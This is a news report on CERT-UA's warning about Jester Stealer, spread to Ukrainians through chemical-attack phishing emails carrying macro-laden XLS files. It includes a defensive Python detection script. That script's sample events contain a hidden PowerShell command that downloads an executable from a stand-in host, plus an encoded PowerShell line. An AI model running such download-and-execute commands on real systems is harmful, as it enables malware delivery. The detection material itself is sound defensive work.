Jester Stealer spread via phishing campaigns, CERT-UA warns

May 19, 2022

Threat actors have been observed spreading an emerging malware strain dubbed Jester Stealer through phishing emails, Ukraine’s CERT-UA (Computer Emergency Response Team) has warned. The emails threaten recipients with looming ‘chemical attacks’ to pressure them into opening the malicious files attached.

The Russia-Ukraine war has been going on for several months. Various threats have been propagated against each side, including the use of lethal weapons. Many malicious actors have exploited the fear this crisis has caused Ukrainians, including by sending mass phishing emails that pressure recipients into opening malware-laden attachments.

According to the researchers’ findings, the phishing emails claim that chemical weapons will be launched against Ukraine at midnight. The senders urge recipients to open the enclosed attachment, which allegedly lists the zones where the chemical agents would be dispersed, implying that opening it could save many Ukrainian lives.

In reality, the attachments are XLS documents containing malicious macros. If a victim opens one in MS Office, the macro retrieves the payload from a remote server and launches it on the victim’s machine. CERT-UA’s advisory noted that the executable files were hosted on compromised websites rather than on the threat actors’ own C2 infrastructure.
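As an added illustration that is not taken from the CERT-UA advisory or from this article, the Python below shows the endpoint trace this infection chain leaves and a simple detection over it: an Office parent process spawning a shell or download-capable utility whose command line contains a URL or a download cmdlet. The events, file paths and the `.invalid` hostname are constructed for the example.

```python
"""Flag Office-spawned downloaders in process-creation telemetry (added example)."""
import re
from typing import List, Optional, Tuple

# Office hosts that should rarely spawn scripting engines or shells.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}
# Children commonly abused by macro droppers to fetch and run a second stage.
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                       "mshta.exe", "certutil.exe", "rundll32.exe", "regsvr32.exe"}
# Command-line markers of an outbound fetch (URL scheme or download helpers).
DOWNLOAD_MARKERS = re.compile(
    r"https?://|DownloadFile|DownloadString|Invoke-WebRequest|urlcache|\biwr\b",
    re.IGNORECASE)

# Constructed Sysmon-style process-creation records, not real telemetry.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c powershell -w hidden (New-Object Net.WebClient)"
                    ".DownloadFile('http://compromised-site.invalid/p.exe','C:\\Users\\Public\\p.exe')"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"ParentImage": r"C:\Windows\explorer.exe",            # user-launched shell: benign here
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c curl http://intranet.invalid/report"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\splwow64.exe",                  # print helper: expected child
     "CommandLine": "splwow64.exe 12288"},
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> Optional[str]:
    """Return a verdict label for one process-creation event, or None if benign."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    if parent not in OFFICE_PARENTS or child not in SUSPICIOUS_CHILDREN:
        return None
    if DOWNLOAD_MARKERS.search(event.get("CommandLine", "")):
        return "office-spawned-downloader"   # matches the XLS-to-payload chain
    return "office-spawned-shell"            # still worth triage, no fetch seen


def scan(events: List[dict]) -> List[Tuple[str, str]]:
    """Return (child process name, verdict) for every event that is not benign."""
    return [(basename(e["Image"]), v) for e in events if (v := classify(e))]


if __name__ == "__main__":
    for child, verdict in scan(SAMPLE_EVENTS):
        print(f"{verdict}: {child}")
```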

Jester Stealer is an info-stealer with extensive capabilities that is sold cheaply.

Having gained notoriety this year, Jester Stealer has been widely used by threat actors in their campaigns. The info-stealer collects data from victims’ browsers, including passwords, email and messaging-app credentials, cryptocurrency wallet credentials and more. The stolen data is transmitted to a malicious server, where its operators collect it to sell on underground marketplaces or reuse in further attacks.

Jester Stealer is also known for encrypting its communications with its operators using AES-CBC-256 and routing them through a Tor network server. It can also send stolen data to Telegram channels owned by the operators.

The info-stealer’s operators have also built in anti-analysis features designed to evade detection and analysis in virtual machines. As of now, no threat actor has been attributed to the ongoing phishing campaign against Ukraine.
